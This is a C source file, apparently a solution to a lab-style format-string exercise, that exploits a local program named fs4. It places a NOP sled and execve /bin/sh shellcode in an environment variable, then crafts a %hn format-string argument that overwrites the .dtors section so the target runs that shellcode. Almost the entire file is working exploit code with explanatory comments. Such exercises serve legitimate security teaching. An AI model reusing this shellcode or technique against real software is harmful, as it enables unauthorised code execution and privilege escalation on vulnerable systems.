
/* Copyright 2002, Gal Badishi */

/* Since we can only overwrite an address with 16 bytes of the form
   0x00XX, we'll overwrite the most significant word of the .dtors
   section in two iterations. First, we'll overwrite the MSW with the word 
   0x00YY, and then we'll overwrite the address that is one byte higher
   than the MSW with the word 0x00XX. This way, the .dtors MSW will become
   0xXXYY. */

/* Since the .dtors section now has the address 0xXXYY0000, our only real
   chance is to put the shellcode in a big environment variable, and
   change the .dtors MSW to the MSW of the stack address. */

/* Notice that unlike fs2, we can supply only one argument, and this
   argument must construct the buffer so that the second call to printf
   will do the same job that the second argument did in fs2. */

/* The command line argument will contain:
     arg[0..3] = DTORS_ADDRESS + 1
     arg[16..20] = DTORS_ADDRESS
     arg[0xbf..0xc1] = "%hn"
   This way, the buffer will write the value 0x00bf to DTORS_ADDRESS in
   the call to printf. */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* execve and exit */

char shellcode[] =
  "\xeb\x1e\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\x89\x54\x24\x04\x89\xd0"
  "\x5e\x88\x46\x07\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\xfe\xc0\xcd\x80"
  "\xe8\xdd\xff\xff\xff/bin/sh";

/* The address of the .dtors section can be found by issuing the command:
   objdump -j .dtors -s fs4 */

#define DTORS_ADDRESS 0x80494b0 + 4 + 2   /* MSW */
#define ENV_SIZE 65534
#define ENV_NAME "GAL="
#define NOP 0x90
#define FILLER 'A'

/* Just in case you want something more complicated */

void fill_nops(char *buf, int size) {
  memset(buf, NOP, size);
}

/* See "usage" for the args */

int main(int argc, char **argv) {
  
  unsigned int esp = (unsigned int) &esp;
  char arg1[256], *ptr;
  char *envbuf;

  /* malloc one more byte for null termination */
  if ((envbuf = malloc(ENV_SIZE + 1)) == NULL) {
    perror("Error in malloc\n");
    exit(1);
  }
  ptr = envbuf;
  fill_nops(ptr, ENV_SIZE - strlen(shellcode));
  ptr += ENV_SIZE - strlen(shellcode);
  memcpy(ptr, shellcode, strlen(shellcode));
  ptr += strlen(shellcode);
  *ptr = '\0';
  ptr = arg1;
  *((unsigned int *) ptr) = DTORS_ADDRESS + 1;
  ptr += sizeof(unsigned int *);
  while (ptr < arg1 + 4 * sizeof(unsigned int))
    *ptr++ = FILLER;
  *((unsigned int *) ptr) = DTORS_ADDRESS;
  ptr += sizeof(unsigned int *);
  while (ptr < arg1 + ((esp >> 24) & 0xff))
    *ptr++ = FILLER;
  *ptr++ = '%';
  *ptr++ = 'h';
  *ptr++ = 'n';
  while (ptr < arg1 + ((esp >> 16) & 0xff)) {
    *ptr++ = FILLER;
  }
  *ptr = '\0';
  if (setenv(ENV_NAME, envbuf, 1) == -1) {
    perror("Error in setenv");
    free(envbuf);
    exit(2);
  }
  execl("./fs4", "./fs4", arg1, NULL);
  free(envbuf);
  return(0);
}


